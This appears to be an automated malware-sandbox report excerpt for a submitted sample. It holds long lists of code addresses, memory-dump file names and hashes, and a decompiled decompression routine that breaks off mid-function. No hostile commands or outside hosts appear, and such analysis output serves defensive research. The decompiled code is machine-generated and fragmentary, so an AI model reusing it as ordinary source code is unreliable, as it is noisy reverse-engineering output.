                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407120

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                          • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                          • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                          • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00407068() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xa;
                                                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 9;
                                                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          					}
                                                          					while(1) {
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						while(1) {
                                                          							L133:
                                                          							_t531 =  *_t606;
                                                          							_t589 = _t531 & 0x0000ffff;
                                                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          							if( *(_t613 - 0xc) >= _t565) {
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          								 *(_t613 - 0x40) = 1;
                                                          								_t532 = _t531 - (_t531 >> 5);
                                                          								 *_t606 = _t532;
                                                          							} else {
                                                          								 *(_t613 - 0x10) = _t565;
                                                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          							}
                                                          							if( *(_t613 - 0x10) >= 0x1000000) {
                                                          								goto L139;
                                                          							}
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								L170:
                                                          								_t568 = 0x22;
                                                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          								_t535 = 0;
                                                          								L172:
                                                          								return _t535;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L139:
                                                          							_t533 =  *(_t613 - 0x84);
                                                          							while(1) {
                                                          								 *(_t613 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t613 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t534 =  *( *(_t613 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t570);
                                                          											_push(9);
                                                          											_pop(_t571);
                                                          											_t609 = _t538 / _t570;
                                                          											_t540 = _t538 % _t570 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t604 = _t540 % _t571 & 0x000000ff;
                                                          											 *(_t613 - 0x3c) = _t604;
                                                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          												L10:
                                                          												if(_t612 == 0) {
                                                          													L12:
                                                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t612 = _t612 - 1;
                                                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          												} while (_t612 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t613 - 4) != 0) {
                                                          												GlobalFree( *(_t613 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t613 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t45 = _t613 - 0x48;
                                                          											 *_t45 =  *(_t613 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t613 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t613 - 0x40);
                                                          											if(_t546 ==  *(_t613 - 0x74)) {
                                                          												L20:
                                                          												 *(_t613 - 0x48) = 5;
                                                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t613 - 0x74) = _t546;
                                                          											if( *(_t613 - 8) != 0) {
                                                          												GlobalFree( *(_t613 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          											 *(_t613 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          											 *(_t613 - 0x84) = 6;
                                                          											 *(_t613 - 0x4c) = _t553;
                                                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          											 *(_t613 - 0x54) = _t606;
                                                          											goto L133;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											_t67 = _t613 - 0x70;
                                                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          											if( *(_t613 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t606;
                                                          											_t589 = _t531 & 0x0000ffff;
                                                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          											if( *(_t613 - 0xc) >= _t565) {
                                                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          												 *(_t613 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												 *_t606 = _t532;
                                                          											} else {
                                                          												 *(_t613 - 0x10) = _t565;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t613 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											}
                                                          										case 5:
                                                          											goto L137;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
